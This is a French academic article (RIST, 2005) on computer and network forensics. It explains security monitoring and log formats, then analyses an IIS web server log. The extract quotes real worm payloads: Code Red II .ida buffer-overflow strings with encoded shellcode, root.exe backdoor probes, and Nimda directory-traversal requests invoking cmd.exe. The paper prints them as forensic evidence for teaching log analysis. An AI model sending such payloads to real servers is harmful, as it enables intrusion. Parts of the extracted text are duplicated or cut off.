Professional Documents
Culture Documents
BENSEFIA Hassina
Centre de Recherche sur lInformation Scientifique et Technique Laboratoire des Logiciels de Base hbensefia@mail.cerist.dz
1. Introduction
La scurit des rseaux dpend de la technologie prventive. Elle consiste mettre en place des systmes de dfense adquats pour rduire le risque des attaques potentielles. Cependant, le spectre des menaces change. Malgr la prsence des systmes de dfense, un rseau demeure vulnrable et sa scurit est compromise par des menaces non identifies. La technologie prventive savre insuffisante pour rpondre aux besoins de la scurit. Les attaques informatiques voluent et envahissent Internet et le monde digital convergeant vers des crimes informatiques rsultant en des pertes significatives de productivit. Alors dautres lments cls complmentaires la technologie prventive sont introduits. La scurit dun systme ncessite dtre surveill de manire permanente fin dinspecter les activits suspectes. Aussi la mise en place dun systme judiciaire est indispensable pour identifier les actes illicites aux systmes et leurs auteurs. Do lmergence de Computer Forensics ou linformatique judiciaire. Apparue comme une raction au crime informatique, Forensics utilise les techniques dinvestigation et salimente des fichiers logs qui peuvent contenir le comportement de lattaquant et les tapes de lattaque. En effet ; ces fichiers constituent le moyen de surveillance de la scurit et une source critique de preuve pour une investigation informatique.
2. la scurit prventive
La scurit des rseaux a pour objectif dempcher les lments malicieux datteindre un rseau [3], elle est fondamentalement base sur la prvention [2]. Les techniques prventives consistent dterminer les menaces potentielles et monter des systmes adquats pour les empcher. Les systmes de scurit prventifs tels que les firewalls agissent comme des obstacles lectroniques dressant une barrire face aux attaques potentielles, ils prennent en compte un nombre limit de menaces [12]. Ils sont passifs devant les nouvelles menaces inconnues. Lutilisation dun systme de scurit nest pas rassurante, mme sil reprsente la meilleure stratgie de scurit. La propagation des virus et du code malicieux dans le e-mail et les pages web sont des exemples dmonstrateurs combien il est possible de compromettre le meilleur systme de scurit cr par la technologie prventive [12]. La technologie prventive a contribu pour rsoudre les problmes de scurit via une multitude de systmes mais les menaces existent toujours et la majorit des rseaux demeurent vulnrables et sont sous attaques dune faon constante. La prvention offre une scurit statique, passive et fondamentalement fragile.
RIST Vol.15 N01-02 Anne 2005.
Pour atteindre une scurit efficace, la scurit prventive a besoin dune couche supplmentaire de protection. Deux lments qui taient pratiquement absents dans le paradigme de la scurit informatique simposent comme concepts cls compltant le rle de la scurit prventive. Ces deux lments sont la surveillance de la scurit et la mise en application de la loi.
3. La surveillance de la scurit
Elle consiste surveiller lactivit des systmes et des rseaux. Elle se concrtise par la vrification en temps rel des traces du trafic entrant et sortant gnrs par un systme tels que les firewalls, les routeurs, les serveurs, etc [2]. Ces traces contiennent linformation concernant les vnements qui arrivent dans le systme. Lanalyse de cette information permet de dtecter les activits suspectes, les attaques en cours et de dterminer si la scurit du systme a t compromise ou en voie de compromission. La surveillance de la scurit dun systme de manire suffisante et en temps rel permet de dtecter un attaquant indiffremment de quelle vulnrabilit il a exploit pour pntrer dans le systme. Lattaquant peut tre repouss au point dentre du rseau avant quil naccomplisse son attaque.
donner naissance une nouvelle discipline dite Computer Forensics ou linformatique lgale ou encore linformatique judiciaire. Computer Forensics englobe aussi la surveillance de la scurit travers la collecte et lanalyse dinformation, lies aux activits des systmes et des rseaux, la recherche de preuve dattaque ou dactivit illicite qui est ltape prliminaire dans le processus de Forensics.
4. Forensics
Le terme Forensics est trs proche du terme forum. Un forum tant un endroit public pour la discussion et le dbat, cest aussi une cour. Ainsi la signification de forensics se rapporte aux cours et la loi, forensics veut dire lgal ou judiciaire. Le terme Forensics dsigne Forensic science ou science lgale , cest lapplication de la science la loi [13]. Elle permet de rsoudre les conflits lgaux en utilisant des mthodes scientifiques. Elle consiste rassembler des signes prouvant quun crime est survenu pour identifier le coupable. Un crime peut tre un vol, une fraude, un meurtre ou un suicide. Les signes sont acquis en utilisant certains domaines scientifiques comme la biologie, la chimie, la science analytique, la psychologie et les mathmatiques [13]. Forensics couvre un ventail de disciplines telles que la pathologie lgale, la srologie lgale, la balistique lgale, lanthropologie lgale, la psychologie lgale, la gologie lgale, etc. qui ont toutes pour rle la rsolution dun crime. Pour trouver des signes pouvant identifier un crime, lexpert en Forensics ou lexpert lgiste examine les traces du matriel pouvant inclure ou exclure une association entre un suspect et une victime. Ces traces peuvent tre le sang, la salive, les impressions de chaussures et de pneus, les poils, les armes feu et les documents. Lexpert lgiste tudie aussi les causes des incendies, des explosions et des accidents de la route [13]. Lanalyse faite par lexpert lgiste est prsente sous forme dun tat crit pouvant tre lu dans un tribunal. Le rsultat dun cas civil ou criminel dpend de lanalyse faite par lexpert lgiste et il est influenc par son interprtation. Pour cette raison lexpert lgiste doit tre dot dune exprience professionnelle et dune comptence ainsi que dune intgrit personnelle. Il doit tre impartial et ayant un intrt neutre dans le rsultat dun cas.
5. Computer Forensics
Une discipline mergeante de la collection et de lanalyse de linformation concernant les ordinateurs et les rseaux dordinateurs pour dtecter les activits suspectes ou malicieuses en vue de lutiliser comme des preuves dans la cour de la loi [3]. Cest lart de dcouvrir et dextraire linformation prouvant loccurrence dun crime informatique de telle faon le rendre admissible dans le tribunal [4]. Considre comme lautopsie du disque dur dun ordinateur, Computer Forensics est une nouvelle science qui est apparue comme une raction au crime informatique. Elle permet dappliquer la loi linformatique, en employant les techniques dinvestigation pour identifier la cause origine dun crime informatique. Un crime informatique peut tre une attaque, une intrusion ou toute activit malicieuse.
6. Network Forensics
Elle est au cur de computer Forensics [12]. Cest le pouvoir de collecter les donnes critiques ncessaires pour suivre et analyser lutilisation illgitime des rseaux et des applications du rseau. Network Forensics tant un processus qui permet de collecter les donnes partir des diffrents dispositifs du rseau et dappliquer les techniques dinvestigation afin de retracer les activits se passant dans le rseau et ce ci dans le but didentifier une attaque et de dcouvrir lidentit de lattaquant durant et aprs lattaque [12]. Le but de Network forensics est de fournir la preuve suffisante pour permettre de poursuivre judiciairement avec succs lauteur dun crime informatique. Comme louverture des rseaux et le degr de leur connectivit reprsentent le paramtre significatif dans lvolution du crime informatique. Nous allons accentuer le point sur le Network Forensics
Il doit avoir les comptences informatiques dun attaquant. Il doit avoir les comptences investigatrices dun dtective. Il doit avoir les comptences judiciaires dun juriste.
Figure 1 : Extrait dun fichier log dun serveur Proxy On remarque que chaque entre contient un ensemble de champs qui sont spar par une virgule. Si on prend la premire entre de ce fichier :
16/01/02, 10:50:39, 193.194.77.227, 193.194.77.228, TCP, 1363, 113, SYN, 0, 193.194.77.228,
Voici la signification de chaque champ : 16/01/02 : est la date de rception du paquet. 10:50:39 : est lheure de rception du paquet. 193.194.77.227 : est ladresse source indiquant ladresse IP de la machine mettrice du paquet. 193.194.77.228 : est ladresse destination indiquant ladresse IP de la machine rceptrice du paquet TCP : est le protocole utilis. 1363 : est le port source indiquant le numro de port relatif lapplication en cours sur la machine mettrice du paquet. 113 : est le port destination indiquant le numro du service sexcutant sur la machine rceptrice du paquet. SYN : est la valeur du drapeau TCP indiquant une requte dtablissement dune connexion. 0 : ce champ indique la rgle de filtrage et il prend pour valeur 0 ou 1. Sil est gal 1, le paquet est accept. Sil est 0, le paquet est rejet. 193.194.77.228 : est ladresse IP de linterface sur la quelle le paquet est reu. La majorit des systmes gnrent des fichiers logs dans un format propritaire qui est mystrieux et difficile le dchiffrer. Il existe plusieurs formats de fichiers logs spcifiques
RIST Vol.15 N01-02 Anne 2005.
aux serveurs Web, serveurs de messageries et les firewalls. Seulement les dveloppeurs peuvent comprendre leur contenu. Lanalyse du contenu dun fichier log exige une bonne comprhension du format et une structure approprie facilitant son analyse. En effet ; des formats standards ont t dvelopps. Parmi les quels, on peut citer : le format W3C Etendu et le format log commun. 9.1. Le format W3C Etendu (Word Wide Web Consortium) [8] Cest un format ASCII adapt avec une varit de champs. Lutilisation de ce format permet dinclure des champs importants comme elle peut omettre des champs non dsirs. Les champs sont spars par un espace, le temps est enregistr en GMT (Greenwich Mean Time). Ce format est disponible pour les serveurs Web et les serveurs FTP. Exemple dune entre 172.16.25.10 02-05-1988 17:42:15 GET /default.html 200 HTTP/1.0 Cette entre signifie que le 02 mai 1998 17h 42 mn 15s (GMT), un utilisateur ayant ladresse IP 172.16.25.10 et en utilisant HTTP 1.0 a lanc une requte GET/default.html. Cette requte signifie le tlchargement de la page Web default.html. La requte est excute avec succs. La valeur 200 tant le code de ltat du service, cette valeur indique le succs de la requte. 9. 2. Le format log commun [8] Cest un format ASCII fix disponible uniquement pour les serveurs Web. Il a t dvelopp par NCSA (National Center for Supercomputing Applications) luniversit dIllinois Urbana-Champaign. Chaque entre contient les champs suivants : Le nom de lhte ou ladresse IP de lhte Le nom de lutilisateur La date de soumission de la requte Le temps de soumission de la requte Le contenu de la requte envoye par le client Le code de ltat HTTP retourn lutilisateur : cest le code de la rponse HTTP envoy par le serveur au client. La taille en octets des informations envoyes par le serveur Les champs sont spars par un espace, le temps enregistr est le temps local. Exemple dune entre 172.21.13.45 FRED 08-04-1998 17 :39 :10 GET/scripts/iisadmin/ism.dll 200 3401 Cette entre indique quun utilisateur appel FRED utilisant une adresse IP 172.21.13.45 a envoy au serveur Web une requte en utilisant la commande HTTP qui est GET pour tlcharger le fichier scripts/iisadmin/ismi.dll. Cette requte a t soumise au serveur le 08 Avril 1998 17h39mn 10 s temps local et elle a t retourne avec succs (code dtat HTTP= 200). Les donnes envoyes lutilisateur FRED ont une taille de 3401 octets. Remarque La rponse dun serveur un client peut tre faite avec succs ou chec. Le code de ltat de la rponse peut renseigner sur ce rsultat. Si le code dtat {200,201,202,203,204,300,301,302,303,304, Alors le serveur a rpondu au client avec succs.
RIST Vol.15 N01-02 Anne 2005.
Si le code dtat {400, 401, 402, 403, 404, 500, 501, 502, 503}, Alors le serveur na pas rpondu la requte, il y a eu un chec et par consquent la taille des donnes transfres au client est gale 0.
Exemple 2 Soit un extrait dun fichier log dun serveur Web IIS de Microsoft :
10.10.10.20 - - [14/Jan/2004:22:30:25 -0500] "GET / HTTP/1.1" 404 299 10.10.10.20 - - [14/Jan/2004:22:30:28 -0500] "GET / HTTP/1.1" 404 299 10.10.10.20 - - [14/Jan/2004:22:31:29 -0500] "GET / HTTP/1.1" 404 299 10.10.10.20 - - [14/Jan/2004:22:31:32 -0500] "GET / HTTP/1.1" 404 299 10.10.10.20 - - [14/Jan/2004:22:31:35 -0500] "GET / HTTP/1.1" 404 299 10.10.10.20 - - [14/Jan/2004:22:34:11 -0500] "GET / HTTP/1.1" 404 299 10.1.4.25 - - [18/Jan/2004:21:57:34 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u780 1%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u 8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 285 10.118.25.74 - - [18/Jan/2004:22:02:17 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u780 1%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u 8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 285 10.30.50.15 - - [18/Jan/2004:22:02:56 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284 10.30.50.15 - - [18/Jan/2004:22:02:56 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282 10.30.50.15 - - [18/Jan/2004:22:02:57 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 10.30.50.15 - - [18/Jan/2004:22:02:57 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 10.30.50.15 - - [18/Jan/2004:22:02:57 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 10.30.50.15 - - [18/Jan/2004:22:02:57 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323 10.30.50.15 - - [18/Jan/2004:22:02:58 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323 10.30.50.15 - - [18/Jan/2004:22:02:58 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339 10.30.50.15 - - [18/Jan/2004:22:02:58 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 10.30.50.15 - - [18/Jan/2004:22:02:58 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 10.30.50.15 - - [18/Jan/2004:22:02:59 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 10.30.50.15 - - [18/Jan/2004:22:02:59 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 10.30.50.15 - - [18/Jan/2004:22:02:59 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296 10.30.50.15 - - [18/Jan/2004:22:02:59 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296 10.30.50.15 - - [18/Jan/2004:22:03:00 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 10.30.50.15 - - [18/Jan/2004:22:03:00 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
1%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 285 10.118.25.74 - - [18/Jan/2004:22:02:17 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u780 1%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 285
Il sagit dune attaque de dbordement de zone tampon (Buffer overflow). Cest une activit virale originaire des systmes identifis par les adresses IP 10.1.4.25 et 10.118.25.74. Le virus est un ver dit Code Red II exploitant une vulnrabilit .ida du service dindexation de Microsoft Internet Information Server IIS[14]. La valeur 404 du code dtat indique que lattaque a chou. Pour les entres suivantes :
10.30.50.15 - - [18/Jan/2004:22:02:56 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284 10.30.50.15 - - [18/Jan/2004:22:02:56 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282 10.30.50.15 - - [18/Jan/2004:22:02:57 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 10.30.50.15 - - [18/Jan/2004:22:02:57 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
10.30.50.15 - - [18/Jan/2004:22:02:57 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 10.30.50.15 - - [18/Jan/2004:22:02:57 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323 10.30.50.15 - - [18/Jan/2004:22:02:58 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323 10.30.50.15 - - [18/Jan/2004:22:02:58 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339 10.30.50.15 - - [18/Jan/2004:22:02:58 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 10.30.50.15 - - [18/Jan/2004:22:02:58 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 10.30.50.15 - - [18/Jan/2004:22:02:59 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 10.30.50.15 - - [18/Jan/2004:22:02:59 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 10.30.50.15 - - [18/Jan/2004:22:02:59 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296 10.30.50.15 - - [18/Jan/2004:22:02:59 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296 10.30.50.15 - - [18/Jan/2004:22:03:00 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 10.30.50.15 - - [18/Jan/2004:22:03:00 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
Nous constatons des tentatives d'accs aux fichiers excutables de Windows. Ces tentatives prennent 05 secondes ce qui signifie que lattaque est mene l'aide d'un script ou d'un programme automatis. Les quatre premires entres indiquent des tentatives de connexion la porte drobe laisse par le ver Code Red II, la suite des entres consiste en des tentatives dexploitation de Directory Traversal vulnerability . Cette vulnrabilit permet des attaquants visitant un
RIST Vol.15 N01-02 Anne 2005.
des
commandes
arbitraires
avec
le
privilge
Il sagit dune activit virale du ver NIMDA exploitant une vulnrabilit dans Microsoft Internet Explorer initie par le systme identifi par ladresse IP 10.30.50.15. Les valeurs 400 et 404 du code dtat indiquent lchec de lattaque.
Les fichiers logs peuvent tre menacs comme dautres formes de donnes dans le
rseau ou dans un systme. Un attaquant qualifi pntrant dans un systme peut effacer les fichiers logs ou modifier leur contenu. Il peut mme arrter le mcanisme denregistrement.
interprte avec prcaution pour accomplir une investigation et russir le processus de Forensics.
Rfrences
[1] The most dangerous place on earth in 2001 : A cyber ethnography Terry M. Gudaitis The Magazine on Information Impacts May 2001 [2] FC : Bruce schneier on computer security :Things are getting worse Bruce schneier July 16, 2001 Testimony and Statement for the United States Senate [3] Fingerprints, Broken WindowsCode everywhere David Britt July 2001 http://www.toplayer.com/content/cm/news66.jsp [4] Policies to Enhance Computer and Network Forensics Alec Yasinsac and Ynet Manzano Workshop on information assurance and security United states Military Academy West point, NY, 5-6 June, 2001 [5] When security fails By Paul Desmond Network World September 2000 [6] Network Forensics Christopher Patrick Murray University of Minnesota, Morris http://web.archive.org/web/20040215100928/http://mrs.umn.edu/~lopezdr/seminar/fall2000/ Murray.htm [7] Techniques for catching the perp: the basics of computer forensics By Don Walker May, 2001 Unisys World [8] About logging site activity http://iishelp.web.cern.ch/IISHelp/iis/htm/core/iiabtlg.htm [9] Lutilisation des log files en valuation et en reconception : intrts et limites Christian Bastien. 2001 http://www.lergonome.org/pages/detail_articles.php?indice=9
RIST Vol.15 N01-02 Anne 2005.
[10] Downloads, Logs and Captures : Evidence from cyberspace Peter Sommer Computer Security Research Center London School of Economics & Political Science http://www.giustizia.it/cassazione/convegni/dic2000/sommer_2.pdf
[11] Digital Evidence and Computer Crime: Forensic Science, Computers, and the Internet Eoghan Casey Edition Academic Press, January Janvier 2000 [12] La conception dune base dune base de connaissance pour laide linvestigation dans Firewall Forensics Bensefia Hassina Mmoire de post-graduation spcialise en scurit Informatique Mai 2002 Centre de Recheche sur lInformation Scientifique et technique Alger, Algrie [13] Forensics For Dummies Douglas. P. Lyle Edition Paperback 2004 [14] www.cert.org CERT Coordination Center